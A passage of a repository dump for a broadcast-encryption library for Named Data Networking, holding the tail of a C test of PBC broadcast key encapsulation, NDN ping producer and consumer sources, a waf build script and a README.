element_out_str(stdout, 0, sys->encr_prod);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\noldp = \");\n element_out_str(stdout, 0, sys->pub_key);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, sys2->pub_key);\n }\n\n\n //int in_recip[5] = {4, 5, 6, 7, 8 };\n //int num_recip = 5;\n //int rems[3] = { 5, 6, 7 };\n //int N_rems = 3;\n //int adds[12] = { 2, 3, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16 };\n //int N_adds = 12;\n // FINAL ELEMENTS IN PRODUCT SHOULD BE 2-8, & 10-16\n\n /*\n Gen_encr_prod_from_indicies(gbs, sys2, in_recip, num_recip);\n\n if(DEBUG) {\n PrintBitString(sys2->recipients,BSL);\n printf(\"\\nsys2 encr_product = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\n\");\n }\n\n Change_encr_prod_indicies(gbs, sys2, adds, N_adds, rems, N_rems);\n if(DEBUG) {\n PrintBitString(sys2->recipients,BSL);\n printf(\"\\nsys2 encr_product = \");\n element_out_str(stdout, 0, sys2->encr_prod);\n printf(\"\\n\");\n }\n\n\n if(DEBUG) {\n PrintBitString(sys->recipients,BSL);\n printf(\"\\nsys1 encr_product = \");\n element_out_str(stdout, 0, sys->encr_prod);\n }\n */\n\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey);\n //if(DEBUG) printf(\"\\ndone 1 decr\\n\");\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey2);\n //if(DEBUG) printf(\"\\ndone 2 decr\\n\");\n Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey3);\n //if(DEBUG) printf(\"\\ndone 3 decr\\n\");\n //Gen_decr_prod_from_indicies(gbs, 2, in_recip, num_recip, &mykey2);\n //Change_decr_prod_indicies(gbs, 2, adds, N_adds, rems, N_rems, &mykey2);\n\n //Gen_decr_prod_from_bitvec(gbs, 2, recip, &mykey3);\n\n\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey1 decr_product = \");\n element_out_str(stdout, 0, mykey.decr_prod);\n printf(\"\\n\");\n }\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey2 decr_product = \");\n element_out_str(stdout, 0, mykey2.decr_prod);\n printf(\"\\n\");\n }\n if(DEBUG) {\n printf(\"\\n\");\n printf(\"mykey3 decr_product = \");\n element_out_str(stdout, 0, mykey3.decr_prod);\n printf(\"\\n\");\n }\n\n\n\n\n //TESTING FOR SINGLE KEY LOAD AND STORE\n priv_key_t load_key = (priv_key_t)pbc_malloc(sizeof(struct single_priv_key_s));\n\n StorePrivKey(\"key2.stor\", &mykey);\n LoadPrivKey(\"key2.stor\", &load_key, gbs);\n\n if(DEBUG) {\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.g_i_gamma);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->g_i_gamma);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.g_i);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->g_i);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.h_i);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->h_i);\n printf(\"\\nold = \");\n element_out_str(stdout, 0, mykey.decr_prod);\n printf(\"\\nnew = \");\n element_out_str(stdout, 0, load_key->decr_prod);\n printf(\"\\n index = %d\", mykey.index);\n printf(\"\\n index = %d\", load_key->index);\n }\n\n ct_t myCT = (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n ct_t myCT2 = (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n ct_t myCT3 = (ct_t) pbc_malloc(sizeof(struct ciphertext_s));\n //int recip2[14] = { 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 16 };\n //int n_recip2 = 14;\n element_t key1;\n element_t key2;\n element_t key3;\n element_t key4;\n element_t key5;\n element_t key6;\n\n BroadcastKEM_using_product(gbs, sys, myCT, key1);\n DecryptKEM_using_product(gbs, &mykey, key4, myCT);\n BroadcastKEM_using_product(gbs, sys, myCT3, key3);\n DecryptKEM_using_product(gbp3, &mykey3, key6, myCT3);\n BroadcastKEM_using_product(gbs, sys, myCT2, key2);\n DecryptKEM_using_product(gbp2, &mykey2, key5, myCT2);\n\n\n //BroadcastKEM_using_bitvec(gbs, sys, recip, myCT2, key2);\n //BroadcastKEM_using_indicies(gbs, sys, myCT3, recip2, n_recip2, key3);\n\n\n if(DEBUG) {\n //COMPARE ALL THREE CTs!\n printf(\"\\n1-C0 = \");\n element_out_str(stdout, 0, myCT->C0);\n printf(\"\\n2-C0 = \");\n element_out_str(stdout, 0, myCT2->C0);\n printf(\"\\n3-C0 = \");\n element_out_str(stdout, 0, myCT3->C0);\n printf(\"\\n1-C1 = \");\n element_out_str(stdout, 0, myCT->C1);\n printf(\"\\n2-C1 = \");\n element_out_str(stdout, 0, myCT2->C1);\n printf(\"\\n3-C1 = \");\n element_out_str(stdout, 0, myCT3->C1);\n }\n\n\n printf(\"\\nkey1 = \");\n element_out_str(stdout, 0, key1);\n printf(\"\\n\");\n printf(\"\\nkey2 = \");\n element_out_str(stdout, 0, key2);\n printf(\"\\n\");\n printf(\"\\nkey3 = \");\n element_out_str(stdout, 0, key3);\n printf(\"\\n\");\n\n //PrintBitString(mykey.recipients, BSL);\n //DecryptKEM_using_product(gbs, &mykey2, key5, myCT2);\n\n\n //printf(\"\\nmyprivkey = \");\n //element_out_str(stdout, 0, mykey.g_i_gamma);\n //printf(\"\\n\");\n printf(\"\\nkey1 = \");\n element_out_str(stdout, 0, key4);\n printf(\"\\n\");\n printf(\"\\nkey2 = \");\n element_out_str(stdout, 0, key5);\n printf(\"\\n\");\n printf(\"\\nkey3 = \");\n element_out_str(stdout, 0, key6);\n printf(\"\\n\");\n\n FreeCT(myCT);\n FreeBCS(sys);\n FreeGBP(gbs);\n FreeGBP(gbp2);\n FreeBCS(sys2);\n FreePK(&mykey);\n return 0;\n\n}\n\n\n\n\n" }, { "alpha_fraction": 0.6314091682434082, "alphanum_fraction": 0.6361629962921143, "avg_line_length": 26.523365020751953, "blob_id": "ae0549f6c8a4ba30a4852895b1e1bf51a7012ba4", "content_id": "dc69419e6b3661b0e5df8e2409b3b5e010164301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5890, "license_type": "no_license", "max_line_length": 101, "num_lines": 214, "path": "/example/producer.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author Eric Newberry <[email protected]>\n * @author Jerald Paul Abraham <[email protected]>\n */\n\n#include \"ndn-producer-bce.hpp\"\n#include \"tracer.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace server {\n\nclass Runner : noncopyable\n{\npublic:\n explicit\n Runner(const Options& options)\n : m_options(options)\n , m_pingServer(m_face, m_keyChain, options)\n , m_tracer(m_pingServer, options)\n , m_signalSetInt(m_face.getIoService(), SIGINT)\n {\n m_signalSetInt.async_wait(bind(&Runner::afterIntSignal, this, _1));\n\n m_pingServer.afterFinish.connect([this] {\n this->cancel();\n });\n }\n\n int\n run()\n {\n try {\n m_pingServer.start();\n m_face.processEvents();\n }\n catch (std::exception& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n return 1;\n }\n\n std::cout << \"\\n--- ping server \" << m_options.prefix << \" ---\" << std::endl;\n std::cout << m_pingServer.getNPings() << \" packets processed\" << std::endl;\n\n return 0;\n }\n\nprivate:\n void\n cancel()\n {\n m_signalSetInt.cancel();\n m_pingServer.stop();\n }\n\n void\n afterIntSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n cancel();\n }\n\nprivate:\n const Options& m_options;\n Face m_face;\n KeyChain m_keyChain;\n PingServer m_pingServer;\n Tracer m_tracer;\n\n boost::asio::signal_set m_signalSetInt;\n};\n\nstatic time::milliseconds\ngetMinimumFreshnessPeriod()\n{\n return time::milliseconds(1000);\n}\n\nstatic void\nusage(const boost::program_options::options_description& options)\n{\n std::cout << \"Usage: ndnpingserver [options] ndn:/name/prefix\\n\"\n \"\\n\"\n \"Starts a NDN ping server that responds to Interests under name \"\n \"ndn:/name/prefix/ping.\\n\"\n \"\\n\";\n std::cout << options;\n exit(2);\n}\n\nint\nmain(int argc, char* argv[])\n{\n Options options;\n options.freshnessPeriod = getMinimumFreshnessPeriod();\n options.shouldLimitSatisfied = false;\n options.nMaxPings = 0;\n options.shouldPrintTimestamp = false;\n options.payloadSize = 0;\n\n namespace po = boost::program_options;\n\n po::options_description visibleOptDesc(\"Allowed options\");\n visibleOptDesc.add_options()\n (\"help,h\", \"print this message and exit\")\n (\"version,V\", \"display version and exit\")\n (\"freshness,x\", po::value<int>(),\n (\"set freshness period in milliseconds (minimum \" +\n std::to_string(getMinimumFreshnessPeriod().count()) + \" ms)\").c_str())\n (\"satisfy,p\", po::value<int>(&options.nMaxPings), \"set maximum number of pings to be satisfied\")\n (\"timestamp,t\", \"log timestamp with responses\")\n (\"size,s\", po::value<int>(&options.payloadSize), \"specify size of response payload\")\n ;\n po::options_description hiddenOptDesc(\"Hidden options\");\n hiddenOptDesc.add_options()\n (\"prefix\", po::value<std::string>(), \"prefix to register\")\n ;\n\n po::options_description optDesc(\"Allowed options\");\n optDesc.add(visibleOptDesc).add(hiddenOptDesc);\n\n try {\n po::positional_options_description optPos;\n optPos.add(\"prefix\", -1);\n\n po::variables_map optVm;\n po::store(po::command_line_parser(argc, argv).options(optDesc).positional(optPos).run(), optVm);\n po::notify(optVm);\n\n if (optVm.count(\"help\") > 0) {\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"version\") > 0) {\n //std::cout << \"ndnpingserver \" << tools::VERSION << std::endl;\n exit(0);\n }\n\n if (optVm.count(\"prefix\") > 0) {\n options.prefix = Name(optVm[\"prefix\"].as<std::string>());\n }\n else {\n std::cerr << \"ERROR: No prefix specified\" << std::endl;\n usage(visibleOptDesc);\n }\n\n if (optVm.count(\"freshness\") > 0) {\n options.freshnessPeriod = time::milliseconds(optVm[\"freshness\"].as<int>());\n\n if (options.freshnessPeriod.count() < getMinimumFreshnessPeriod().count()) {\n std::cerr << \"ERROR: Specified FreshnessPeriod is less than the minimum \"\n << getMinimumFreshnessPeriod() << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"satisfy\") > 0) {\n options.shouldLimitSatisfied = true;\n\n if (options.nMaxPings < 1) {\n std::cerr << \"ERROR: Maximum number of pings to satisfy must be greater than 0\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n\n if (optVm.count(\"timestamp\") > 0) {\n options.shouldPrintTimestamp = true;\n }\n\n if (optVm.count(\"size\") > 0) {\n if (options.payloadSize < 0) {\n std::cerr << \"ERROR: Payload size must be greater than or equal to 0\" << std::endl;\n usage(visibleOptDesc);\n }\n }\n }\n catch (const po::error& e) {\n std::cerr << \"ERROR: \" << e.what() << std::endl;\n usage(visibleOptDesc);\n }\n\n std::cout << \"PING SERVER \" << options.prefix << std::endl;\n return Runner(options).run();\n}\n\n} // namespace server\n} // namespace ping\n} // namespace ndn\n\nint\nmain(int argc, char** argv)\n{\n return ndn::ping::server::main(argc, argv);\n}\n" }, { "alpha_fraction": 0.6530120372772217, "alphanum_fraction": 0.6589266061782837, "avg_line_length": 24.646066665649414, "blob_id": "634f61ac9753b27c6a0aeb249d4853780b3c5c71", "content_id": "99f31fb7ad0dc4b413c6c19c841816783fa704f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4565, "license_type": "no_license", "max_line_length": 97, "num_lines": 178, "path": "/src/client/ndn-consumer-bce.hpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015-2016, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n * @author: Teng Liang <[email protected]>\n */\n\n#ifndef NDN_BCE_CONSUMER_HPP\n#define NDN_BCE_CONSUMER_HPP\n\n#include \"../common.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\ntypedef time::duration<double, time::milliseconds::period> Rtt;\n\n/**\n * @brief options for ndnping client\n */\nstruct Options\n{\n Name prefix; //!< prefix pinged\n bool shouldAllowStaleData; //!< allow stale Data\n bool shouldGenerateRandomSeq; //!< random ping sequence\n bool shouldPrintTimestamp; //!< print timestamp\n int nPings; //!< number of pings\n time::milliseconds interval; //!< ping interval\n time::milliseconds timeout; //!< timeout threshold\n uint64_t startSeq; //!< start ping sequence number\n name::Component clientIdentifier; //!< client identifier\n};\n\n/**\n * @brief NDN modular ping client\n */\nclass Ping : noncopyable\n{\npublic:\n Ping(Face& face, const Options& options);\n\n /**\n * @brief Signals on the successful return of a Data packet\n *\n * @param seq ping sequence number\n * @param rtt round trip time\n */\n signal::Signal<Ping, uint64_t, Rtt> afterData;\n\n /**\n * @brief Signals on the return of a Nack\n *\n * @param seq ping sequence number\n * @param rtt round trip time\n * @param header the received Network NACK header\n */\n signal::Signal<Ping, uint64_t, Rtt, lp::NackHeader> afterNack;\n\n /**\n * @brief Signals on timeout of a packet\n *\n * @param seq ping sequence number\n */\n signal::Signal<Ping, uint64_t> afterTimeout;\n\n /**\n * @brief Signals when finished pinging\n */\n signal::Signal<Ping> afterFinish;\n\n /**\n * @brief Start sending ping interests\n *\n * @note This method is non-blocking and caller need to call face.processEvents()\n */\n void\n start();\n\n /**\n * @brief Stop sending ping interests\n *\n * This method cancels any future ping interests and does not affect already pending interests.\n *\n * @todo Cancel pending ping interest\n */\n void\n stop();\n\nprivate:\n /**\n * @brief Creates a ping Name from the sequence number\n *\n * @param seq ping sequence number\n */\n Name\n makePingName(uint64_t seq) const;\n\n /**\n * @brief Performs individual ping\n */\n void\n performPing();\n\n /**\n * @brief Called when a Data packet is received in response to a ping\n *\n * @param interest NDN interest\n * @param data returned data\n * @param seq ping sequence number\n * @param sendTime time ping sent\n */\n void\n onData(const Interest& interest,\n const Data& data,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime);\n\n /**\n * @brief Called when a Nack is received in response to a ping\n *\n * @param interest NDN interest\n * @param nack returned nack\n * @param seq ping sequence number\n * @param sendTime time ping sent\n */\n void\n onNack(const Interest& interest,\n const lp::Nack& nack,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime);\n\n /**\n * @brief Called when ping timed out\n *\n * @param interest NDN interest\n * @param seq ping sequence number\n */\n void\n onTimeout(const Interest& interest, uint64_t seq);\n\n /**\n * @brief Called after ping received or timed out\n */\n void\n finish();\n\nprivate:\n const Options& m_options;\n int m_nSent;\n uint64_t m_nextSeq;\n int m_nOutstanding;\n Face& m_face;\n scheduler::Scheduler m_scheduler;\n scheduler::ScopedEventId m_nextPingEvent;\n};\n\n} // namespace client\n} // namespace ping\n} // namespace ndn\n\n#endif // NDN_BCE_CONSUMER_HPP\n" }, { "alpha_fraction": 0.6721054315567017, "alphanum_fraction": 0.6736742854118347, "avg_line_length": 24.496000289916992, "blob_id": "c37f51f4f9a63b8f4bdea5eac20837872a9c30bc", "content_id": "0c574a7c3c68140f3ca2cdd67631b04ff44c8a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3187, "license_type": "no_license", "max_line_length": 100, "num_lines": 125, "path": "/src/server/ndn-producer-bce.hpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author Eric Newberry <[email protected]>\n * @author Jerald Paul Abraham <[email protected]>\n */\n\n#ifndef NDN_BCE_PRODUCER_HPP\n#define NDN_BCE_PRODUCER_HPP\n\n#include \"../common.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace server {\n\n/**\n * @brief options for ndnping server\n */\nstruct Options\n{\n Name prefix; //!< prefix to register\n time::milliseconds freshnessPeriod; //!< freshness period\n bool shouldLimitSatisfied; //!< should limit the number of pings satisfied\n int nMaxPings; //!< max number of pings to satisfy\n bool shouldPrintTimestamp; //!< print timestamp when response sent\n int payloadSize; //!< user specified payload size\n};\n\n/**\n * @brief NDN modular ping server\n */\nclass PingServer : noncopyable\n{\npublic:\n PingServer(Face& face, KeyChain& keyChain, const Options& options);\n\n /**\n * @brief Signals when Interest received\n *\n * @param name incoming interest name\n */\n signal::Signal<PingServer, Name> afterReceive;\n\n /**\n * @brief Signals when finished pinging\n */\n signal::Signal<PingServer> afterFinish;\n\n /** @brief starts ping server\n *\n * If options.shouldLimitSatisfied is false, this method does not return unless there's an error.\n * Otherwise, this method returns when options.nMaxPings Interests are processed.\n */\n void\n run();\n\n /**\n * @brief starts the Interest filter\n *\n * @note This method is non-blocking and caller need to call face.processEvents()\n */\n void\n start();\n\n /**\n * @brief Unregister set interest filter\n */\n void\n stop();\n\n /**\n * @brief gets the number of pings received\n */\n int\n getNPings() const;\n\nprivate:\n /**\n * @brief Called when interest received\n *\n * @param interest incoming interest\n */\n void\n onInterest(const Interest& interest);\n\n /**\n * @brief Called when prefix registration failed\n *\n * @param reason reason for failure\n */\n void\n onRegisterFailed(const std::string& reason);\n\nprivate:\n const Options& m_options;\n KeyChain& m_keyChain;\n Name m_name;\n int m_nPings;\n Face& m_face;\n Block m_payload;\n\n const RegisteredPrefixId* m_registeredPrefixId;\n};\n\n} // namespace server\n} // namespace ping\n} // namespace ndn\n\n#endif //NDN_BCE_PRODUCER_HPP\n" }, { "alpha_fraction": 0.64573734998703, "alphanum_fraction": 0.6540898680686951, "avg_line_length": 22.944828033447266, "blob_id": "cfc133c98f58f1ef1363c62b49c84f86ca9c3e57", "content_id": "7ddb6464894ad2aa4dc9b1e32997fec36a364ab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3472, "license_type": "no_license", "max_line_length": 100, "num_lines": 145, "path": "/src/client/ndn-consumer-bce.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2014-2017, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n * @author: Teng Liang <[email protected]>\n */\n\n#include \"ndn-consumer-bce.hpp\"\n#include <ndn-cxx/util/random.hpp>\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\nPing::Ping(Face& face, const Options& options)\n : m_options(options)\n , m_nSent(0)\n , m_nextSeq(options.startSeq)\n , m_nOutstanding(0)\n , m_face(face)\n , m_scheduler(m_face.getIoService())\n , m_nextPingEvent(m_scheduler)\n{\n if (m_options.shouldGenerateRandomSeq) {\n m_nextSeq = random::generateWord64();\n }\n}\n\nvoid\nPing::start()\n{\n performPing();\n}\n\nvoid\nPing::stop()\n{\n m_nextPingEvent.cancel();\n}\n\nvoid\nPing::performPing()\n{\n BOOST_ASSERT((m_options.nPings < 0) || (m_nSent < m_options.nPings));\n\n Name pingPacketName = makePingName(m_nextSeq);\n\n Interest interest(pingPacketName);\n interest.setMustBeFresh(!m_options.shouldAllowStaleData);\n interest.setInterestLifetime(m_options.timeout);\n\n auto now = time::steady_clock::now();\n m_face.expressInterest(interest,\n bind(&Ping::onData, this, _1, _2, m_nextSeq, now),\n bind(&Ping::onNack, this, _1, _2, m_nextSeq, now),\n bind(&Ping::onTimeout, this, _1, m_nextSeq));\n\n ++m_nSent;\n ++m_nextSeq;\n ++m_nOutstanding;\n\n if ((m_options.nPings < 0) || (m_nSent < m_options.nPings)) {\n m_nextPingEvent = m_scheduler.scheduleEvent(m_options.interval, bind(&Ping::performPing, this));\n }\n else {\n finish();\n }\n}\n\nvoid\nPing::onData(const Interest& interest,\n const Data& data,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime)\n{\n time::nanoseconds rtt = time::steady_clock::now() - sendTime;\n\n afterData(seq, rtt);\n\n finish();\n}\n\nvoid\nPing::onNack(const Interest& interest,\n const lp::Nack& nack,\n uint64_t seq,\n const time::steady_clock::TimePoint& sendTime)\n{\n time::nanoseconds rtt = time::steady_clock::now() - sendTime;\n\n afterNack(seq, rtt, nack.getHeader());\n\n finish();\n}\n\nvoid\nPing::onTimeout(const Interest& interest, uint64_t seq)\n{\n afterTimeout(seq);\n\n finish();\n}\n\nvoid\nPing::finish()\n{\n if (--m_nOutstanding >= 0) {\n return;\n }\n\n afterFinish();\n}\n\nName\nPing::makePingName(uint64_t seq) const\n{\n Name name(m_options.prefix);\n name.append(\"ping\");\n if (!m_options.clientIdentifier.empty()) {\n name.append(m_options.clientIdentifier);\n }\n name.append(std::to_string(seq));\n\n return name;\n}\n\n} // namespace client\n} // namespace ping\n} // namespace ndn\n" }, { "alpha_fraction": 0.6761207580566406, "alphanum_fraction": 0.6761207580566406, "avg_line_length": 42.68000030517578, "blob_id": "475c6e6706274664ef51936599e425f15f361c2c", "content_id": "aa9480a2abf0ee8ab58ff938f9a17530930ee3f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1093, "license_type": "no_license", "max_line_length": 194, "num_lines": 25, "path": "/wscript", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nAPPNAME = 'broadcast-encryption'\n\ntop = '.'\nout = 'build'\n\ndef options(opt):\n opt.load(['compiler_c', 'compiler_cxx'])\n opt.load(['boost'], tooldir=['.waf-tools'])\n\ndef configure(conf):\n conf.load(['compiler_c', 'compiler_cxx'])\n conf.check_boost(lib='system iostreams regex')\n conf.check_cfg(package='libndn-cxx', args=['--cflags', '--libs'],\n uselib_store='NDN_CXX', mandatory=True)\n\ndef build(bld):\n #bld.read_shlib('gmp', paths=['/usr/local/lib'])\n #bld.read_shlib('pbc', paths=['/usr/local/lib'])\n bld.shlib(source='src/client/ndn-consumer-bce.cpp src/client/statistics-collector.cpp src/client/tracer.cpp src/server/ndn-producer-bce.cpp src/server/tracer.cpp', target='bce', use='NDN_CXX')\n bld.program(source='example/consumer.cpp', target='consumer', use='bce', includes=\"src/client\")\n bld.program(source='example/producer.cpp', target='producer', use='bce', includes=\"src/server\")\n #bld.shlib(source='src/bce.c', target='bce', use='gmp pbc')\n #bld.program(source='tests/testbce.c', target='test', use='gmp pbc bce', includes=\"src\")\n\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.6947368383407593, "avg_line_length": 22.75, "blob_id": "574f305ac7ec9ab2197415f00408983e0d096e25", "content_id": "6e16124838ceb1dc7b1913923b575b6987e0af3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 95, "license_type": "no_license", "max_line_length": 65, "num_lines": 4, "path": "/README.md", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "broadcast-encryption\n======\n\nA warp of [PBC_BCE](https://crypto.stanford.edu/pbc/bce/) for NDN\n" }, { "alpha_fraction": 0.6360103487968445, "alphanum_fraction": 0.6415802836418152, "avg_line_length": 27.382352828979492, "blob_id": "74f603a96098d06719ca8b59b8398614a307f940", "content_id": "8a44fec416693ae02ef4e83e3a26a8dd93022f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7720, "license_type": "no_license", "max_line_length": 100, "num_lines": 272, "path": "/example/consumer.cpp", "repo_name": "jeffrey-hsi/broadcast-encryption", "src_encoding": "UTF-8", "text": "/* -*- Mode:C++; c-file-style:\"gnu\"; indent-tabs-mode:nil; -*- */\n/**\n * Copyright (c) 2014-2015, Arizona Board of Regents.\n *\n * This file is part of ndn-tools (Named Data Networking Essential Tools).\n * See AUTHORS.md for complete list of ndn-tools authors and contributors.\n *\n * ndn-tools is free software: you can redistribute it and/or modify it under the terms\n * of the GNU General Public License as published by the Free Software Foundation,\n * either version 3 of the License, or (at your option) any later version.\n *\n * ndn-tools is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR\n * PURPOSE. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License along with\n * ndn-tools, e.g., in COPYING.md file. If not, see <http://www.gnu.org/licenses/>.\n *\n * @author: Jerald Paul Abraham <[email protected]>\n * @author: Eric Newberry <[email protected]>\n */\n\n#include \"ndn-consumer-bce.hpp\"\n#include \"statistics-collector.hpp\"\n#include \"tracer.hpp\"\n\nnamespace ndn {\nnamespace ping {\nnamespace client {\n\nclass Runner : noncopyable\n{\npublic:\n explicit\n Runner(const Options& options)\n : m_ping(m_face, options)\n , m_statisticsCollector(m_ping, options)\n , m_tracer(m_ping, options)\n , m_signalSetInt(m_face.getIoService(), SIGINT)\n , m_signalSetQuit(m_face.getIoService(), SIGQUIT)\n {\n m_signalSetInt.async_wait(bind(&Runner::afterIntSignal, this, _1));\n m_signalSetQuit.async_wait(bind(&Runner::afterQuitSignal, this, _1));\n\n m_ping.afterFinish.connect([this] {\n this->cancel();\n });\n }\n\n int\n run()\n {\n try {\n m_ping.start();\n m_face.processEvents();\n }\n catch (std::exception& e) {\n m_tracer.onError(e.what());\n return 2;\n }\n\n Statistics statistics = m_statisticsCollector.computeStatistics();\n\n std::cout << statistics << std::endl;\n\n if (statistics.nReceived == statistics.nSent) {\n return 0;\n }\n else {\n return 1;\n }\n }\n\nprivate:\n void\n cancel()\n {\n m_signalSetInt.cancel();\n m_signalSetQuit.cancel();\n m_ping.stop();\n }\n\n void\n afterIntSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n cancel();\n }\n\n void\n afterQuitSignal(const boost::system::error_code& errorCode)\n {\n if (errorCode == boost::asio::error::operation_aborted) {\n return;\n }\n\n m_statisticsCollector.computeStatistics().printSummary(std::cout);\n m_signalSetQuit.async_wait(bind(&Runner::afterQuitSignal, this, _1));\n };\n\nprivate:\n Face m_face;\n Ping m_ping;\n StatisticsCollector m_statisticsCollector;\n Tracer m_tracer;\n\n boost::asio::signal_set m_signalSetInt;\n boost::asio::signal_set m_signalSetQuit;\n};\n\nstatic time::milliseconds\ngetMinimumPingInterval()\n{\n return time::milliseconds(1);\n}\n\nstatic time::milliseconds\ngetDefaultPingInterval()\n{\n return time::milliseconds(1000);\n}\n\nstatic time::milliseconds\ngetDefaultPingTimeoutThreshold()\n{\n return time::milliseconds(4000);\n}\n\nstatic void\nusage(const boost::program_options::options_description& options)\n{\n std::cout << \"Usage: ndnping [options] ndn:/name/prefix\\n\"\n \"\\n\"\n \"Ping a NDN name prefix using Interests with name ndn:/name/prefix/ping/number.\\n\"\n \"The numbers in the Interests are randomly generated unless specified.\\n\"\n 